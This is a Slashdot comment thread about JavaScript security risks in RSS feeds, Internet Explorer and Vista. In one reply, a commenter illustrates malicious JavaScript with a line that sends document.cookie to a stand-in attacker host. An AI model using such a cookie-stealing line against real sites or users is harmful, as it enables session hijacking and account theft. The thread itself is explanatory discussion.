
Isn't the problem client side? (1)

JesperJ (900341) | more than 7 years ago | (#15858024)

The problem is not whether JavaScript should be accepted or not, but rather how can we improve the browsers and the feed readers. The readers for the first instance should not be parsing JavaScript at all, problem solved there. But even more important; browsers should not be able to parse malicious JS code. If only the browsers and the client side would be mended not not to parse evil JavaScript these kind of news would never appear again. :-)

Not a big deal right now (1)

kolme (981304) | more than 7 years ago | (#15858133)

The problem with malware and other stuff is that they trick the user into doing something stupid, ie running an executable attachment or visiting some malicious web with IE. Any experienced user wouldn't do that.

Suscribing to a RSS feed isn't what the average user do, and I don't think you'd do it without realizing. Most people won't even have a RSS reader installed.

But wait until Vista have mass adoption. It'll have RSS everywhere and average users will start to use it. Then there will be a problem.

Bigger Picture (0)

Anonymous Coward | more than 7 years ago | (#15858411)

This is about more then just the users who subscribe to RSS feeds through readers. It affects a lot more. I wrote a paper on this last year because Yahoo was vulnerable to letting bad feeds be added to its' website, which I bet you a lot more people will click a button saying "add this feed to My Yahoo!"

It is important to get the message out to all levels of people who plan on doing anything with RSS feeds that they can not be trusted at all and must be sanitized fully. Especially if you are going to allow a user to customize your site and add feeds to it, cause now whatever malicious code get's in those feeds it's running as you.

http://seclists.org/bugtraq/2005/Oct/0205.html [seclists.org]

Cheers,
Jeremy
alljer at gmail.com

I told you so (1)

Prototerm (762512) | more than 7 years ago | (#15858491)

People gave me a lot of flack a while back, whan I objected to Microsoft wanting to incorporate RSS links into Vista. At the time, I claimed that Microsoft has a bad habit of linking unrelated things into the OS at a low level, resulting in what would otherwise be minor anoyances turning into system-wide disasters.

Oh, my, now it turns out that RSS feeds have a potential vulnerability. What a surprise! Imagine now if RSS inherently had links deep within your OS.

Applications should be separated from the OS and other applications on a Need To Know basis, like in Unix/Linux, not mashed together because some marketing droid figures it'd make a good selling point to the clueless masses.

Microsoft Windows: Insecure By Design.
(\soapbox)

How about an example of malicious javascript? (1)

cheekymatt (175255) | more than 7 years ago | (#15858574)

OK, here's a question: What *exactly* is malicious javascript? Javascript has no access to your local filesystem, so, aside from displaying something nasty or redirecting the user to some different url, or something like that, what is "malicious javascript" capable of??

Cheers

Matt

Re:How about an example of malicious javascript? (1)

y5 (993724) | more than 7 years ago | (#15859587)

window.location = 'http://www.malicioussite.com/?victimcookie=' + document.cookie;

That's one example off the top of my head. I don't see how this relates to RSS feeds, but examples of malicious javascript injections are definitely out there.

Re:How about an example of malicious javascript? (0)

Anonymous Coward | more than 7 years ago | (#15861699)

INCREASING security concerns?! (0)

Anonymous Coward | more than 7 years ago | (#15860504)

I love deadpan statements like this:

JavaScript is a scripting language that experts say is increasingly causing security concerns.

How the hell can Javascript concerns increase?! Javascript was a bad idea from day 1 and I thought security concerns were at pretty much maximum possible (i.e. the only sane thing to do with Javascript was to disable it) for many years.

If anything, it looks like Javascript security concerns are now decreasing, since more people seem to be re-enabling it and accepting the risks, because of the AJAX fad.

Or maybe I missed the whole point. Maybe they're saying the concern is increasing, because the fad has people starting to turn it on again? Either way, it just seems weird. Saying Javascript security concerns are increasing, is something like saying that people are starting to get worried about the health effects of nearby nuclear weapon detonations.

And then there's this:

Additionally, some reader software on Windows systems uses Internet Explorer to display feed content, but doesn't use basic security settings that isolate the content. Instead, the JavaScript is downloaded to the PC and has full access, which can fully expose a user's PC, Auger said.
*cough* People are still using an application that has been well-known for over a decade now, to be unsafe for use on the Internet, and now you're blaming Javascript and RSS?! Talk about mis-diagnosis! "Yeah, we're finding that people who live in grass shacks near the nuclear test site, are having health problems. This raises questions about grass shacks."
Check for New Comments
Slashdot Login

Need an Account?

Forgot your password?
or Connect with...

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>